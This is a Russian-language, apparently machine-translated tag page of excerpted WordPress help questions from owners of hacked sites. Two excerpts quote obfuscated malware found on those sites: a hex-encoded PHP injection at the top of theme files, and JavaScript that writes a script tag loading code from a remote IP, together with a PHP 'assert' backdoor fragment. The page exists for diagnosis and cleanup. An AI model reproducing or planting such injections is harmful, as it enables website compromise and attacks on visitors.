Articles of взломан

Найти и заменить текст во всей таблице с помощью запроса MySQL

Сайт взломан, и они ввели javascript в каждый пост, страницу и продукт (woocommerce). Редактирование каждой страницы вручную потребовалось бы навсегда, у нас более 3000 сообщений. Есть ли простая находка и замена, которые мы могли бы использовать для удаления этого javascript?

Увеличение загрузки процессора из-за спама admin-ajax.php

Я испытал, что мой сервер получил нагрузку на процессор в 99%, и сайт идет почти вниз. Проверьте файл журнала доступа, и есть несколько следующих записей: 203.115.XXX.XXX – – [13/Oct/2017:12:40:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.0" 200 178 212.92.XXX.XXX – – [13/Oct/2017:12:40:01 +0000] "GET /wp-admin/admin-ajax.php HTTP/1.0" 200 1 218.29.XXX.XXX – – [13/Oct/2017:12:40:02 +0000] "GET /wp-admin/admin-ajax.php HTTP/1.0" 200 1 […]

Как найти вредоносную ссылку на веб-сайте wp

Недавно я получил обновление от adwords, что у моего сайта была неприятная ссылка – http://www.i7wp.org . Я не знаю, как найти это в моем wp-admin и удалить его. Я не использую FTP и использую построитель страниц, чтобы сделать сайт. Можете ли вы предложить, как мне удалить эту ссылку?

Странные коды на моем сайте WordPress и мой сайт работают слишком медленно

У меня есть сайт WordPress, в последнее время я видел слишком много медленной страницы индекса загрузки. В течение двух недель я пытался найти проблему, но ничего не нашел. В прошлый день я делал резервную копию всех файлов и удалял все с моего сайта и когда открывал страницу индекса сайта в блокноте ++. Я видел слишком […]

Вредоносное ПО на сайте

Привет, когда я пытаюсь ввести свой сайт, я перенаправляюсь на другой сайт. Появляется файл htaccess, который был изменен. Когда я просматриваю сайт с помощью Sucuri, я получаю эту ошибку. Известная вредоносная программа javascript. Подробности: http://sucuri.net/malware/malware-entry-mwhta7 Местоположение: http://ca-no.ru/example/status.php Как я могу исправить это навсегда? У меня уже была эта проблема на прошлой неделе и сброс файла […]

Имя пользователя было изменено на "admin"

Я подозреваю, что на моем сайте WordPress произошел хакерский инцидент. Мое имя пользователя было изменено на «admin». Как безопасно вернуть мое имя пользователя? благодаря

Я был взломан? Таинственный код в верхней части файлов тем

Я нашел следующее в верхней части всех моих файлов тем. У моей локальной копии это не так! WordPress v4.2.2 работает на сервере Linux. Плагины: расширенные пользовательские поля <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) {$ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $jobconrfpf = '5c%x78257-MSV,6<*)ujojR%x5c%x7b\40\x2f\52\x20\153\x6a\145\x62\161\x61\165\x67\160\x68\40\x2a\57\x20"; $ournfmcogg=substr($jobconrfpf,(42613-32500),(69-57)); $ournfmcogg($xqycebdlqb, $pvjekxgoli, NULL); $ournfmcogg=$pvjekxgoli; $ournfmcogg=(464-343); $jobconrfpf=$ournfmcogg-1; ?> Я продолжаю и продолжаю. Я […]

Сайт взломан – исправлен – теперь нельзя активировать тему

Мой сайт WordPress взломан, я исправил проблему, но мне пришлось удалить тему TwentyFifteen (ту, которая была взломана). Тема, которую я изначально использовал, была другой, но хакеры взломали тему TwentyFifteen. Когда я удалил тему, я вернулся к панели инструментов WordPress и увидел следующее: Как вы можете видеть, это не признание какой-либо темы, и я не могу […]

Как найти бэкдор взлома

Сегодня был взломан один из сайтов WordPress наших клиентов, который размещен с amazon aws ubuntu. Проблема: https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html Код js вводится во все js var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80)) и в index.php //###====### @error_reporting(E_ALL); @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = […]

Не удается получить доступ к htaccess

у моего htaccess есть chmod 444, и для меня это невозможно для администратора с доступом к ftp для его редактирования. Также, если я отключу все плагины безопасности wp. Когда я меняю chmod на 644, или если я просто удалю файл и создаю новый, возможно, его можно будет отредактировать на короткое время. Но через некоторое время […]

Intereting Posts
Должен ли я удалить install.php и install-helper.php? Баннер появляется на страницах, но не в сообщениях; называть это условной путаницей Обновление до SSL-перерывов Панель управления администратора Установите и активируйте плагины через 200 приложений WordPress через SSH Интеграция с корзиной покупок – опыт использования популярных решений для электронной коммерции Выводить настраиваемое текстовое поле как неупорядоченный список Пользовательский фильтр запросов не работает на странице категории woocommerce Модель выпуска для WordPress? Самые комментируемые последние 24 часа, неделя, месяц, год и все время – posts_where Вопрос о синтаксисе WooCommerce Опросы с соответствующими комментариями? Добавление menu_order к странице администратора CPT Добавление строк в подборщик медиа Woocommerce: Изменение вариаций выбирает значение по умолчанию? Где я могу создать свою собственную функцию в wp-admin